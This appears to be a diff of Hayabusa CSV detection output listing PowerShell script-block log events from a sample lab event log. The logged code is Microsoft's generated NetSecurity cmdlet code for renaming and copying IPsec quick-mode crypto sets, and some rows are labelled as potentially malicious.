[Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession}",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.660 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecQuickModeCryptoSet' -Alias '*' function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.660 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecQuickModeCryptoSet' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
